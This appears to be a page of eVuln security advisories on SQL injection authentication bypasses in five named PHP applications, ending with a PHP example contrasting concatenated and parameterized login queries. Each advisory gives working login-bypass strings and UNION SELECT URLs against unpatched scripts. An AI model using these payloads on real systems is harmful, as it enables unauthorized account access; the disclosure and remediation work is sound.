Recent Authentication Bypass SQL Injection vulnerabilities
Here is a short summary of recent Authentication Bypass SQL Injection vulnerabilities discovered by the eVuln team. The full list with details is available on the eVuln Security Advisories page.
Authentication Bypass by SQL Injection in Social Share.
Description.
Vulnerable script: functions.php
The username parameter is not properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code to run any SQL query and to log in without a password.
Condition: magic_quotes: off
Exploit.
Username: anytext' or verified=1#
Password: arbitrary_text
Solution
Solution is not available.
SQL injection Auth Bypass in Easy Banner Free.
Description.
The vulnerability exists in the member.php script. The user-defined parameters username and password are not properly sanitized against SQL injection. This can be used to bypass authentication or to execute arbitrary SQL queries.
Exploit.
Authentication bypass in member.php is possible using one of the following SQL injections:
username: ' or 1#
password: ' or 'a'='a
Condition: magic_quotes_gpc = off
Solution
Solution is not available.
SQL-inj and Auth Bypass in 2200net Calendar system.
Description.
Vulnerable script: program/calendar/calendar.php
Variable fm_data[id] isn't properly sanitized. An attacker can inject arbitrary SQL code to run any SQL query.
Condition: magic_quotes_gpc - off
Vulnerable script: class/classlogin/adminlogin.php
Variable $ad['acc'] isn't properly sanitized. An attacker can inject arbitrary SQL code to run any SQL query.
Condition: magic_quotes_gpc - off
Exploit.
url: http://host/cal/admin.php?ad=login
login account: ' or 1/*
login password: any
http://host/cal/main.php?&po=calendar&op=calendar_only&fm_data[id]=999'%20union%20select%201,2,3,4,5,6,7,8,9/*
Solution
Solution is not available.
SQL Injection and Authentication Bypass in Calendarix.
Description.
Vulnerable scripts: cal_functions.inc.php, admin/cal_login.php
Variables $catview (cal_functions.inc.php) and $login (admin/cal_login.php) are not properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code to run any SQL query.
Authentication bypass is possible.
Condition for Authentication bypass: magic_quotes_gpc - off
Exploit.
Link: http://host/calendarix/admin/cal_login.php
username: ' or 1/*
password: any
http://host/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99%20union%20select%2012345
Solution
Solution is not available.
SQL Injection Auth Bypass in Bit 5 Blog.
Description.
Vulnerable script: processlogin.php
Variables $_POST['username'] and $_POST['password'] are not properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code to run any SQL query and to log in without a password.
Exploit.
Authentication bypass example (SQL Injection):
http://host/admin/index.php
User Name: a' or 1/*
Password: a' or 1/*
Solution
Solution is not available.
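The five advisories above share one root cause, a login query built by pasting request input into the SQL text, and none lists a solution. As an added example (not code from eVuln or from any of the affected products), the script below puts that pattern beside a parameterized login and runs both against a login string quoted in the advisories; the users table, the sample account and the function names are assumptions, and an in-memory SQLite database stands in for the applications' own database.

```php
<?php
// Added example: the schema, sample account and function names are constructed,
// not taken from the affected products.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, pass_hash TEXT)');
// "password" is a legacy plaintext column, kept only so the flawed query can run.
$db->prepare('INSERT INTO users VALUES (?, ?, ?)')
   ->execute(['admin', 's3cret', password_hash('s3cret', PASSWORD_DEFAULT)]);

// Flawed pattern: input is pasted into the SQL text, so a quote in $user
// ends the string literal and whatever follows is parsed as SQL.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT username FROM users WHERE username = '$user' AND password = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened pattern: the username travels as a bound parameter and is only ever
// compared as data; the password is checked in PHP against a stored hash, so it
// never appears in the SQL text at all.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

$cases = [
    ["' or 1/*", 'any'],     // login string quoted in the advisories above
    ['admin',    's3cret'],  // constructed valid login
    ['admin',    'wrong'],   // constructed invalid login
];
foreach ($cases as [$user, $pass]) {
    printf("%-10s concat=%-5s prepared=%s\n", $user,
        var_export(login_concat($db, $user, $pass), true),
        var_export(login_prepared($db, $user, $pass), true));
}
```

The magic_quotes_gpc setting named in the advisories' conditions was removed in PHP 5.4, so escaping cannot be left to the runtime; bound parameters have to be applied in each affected query.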

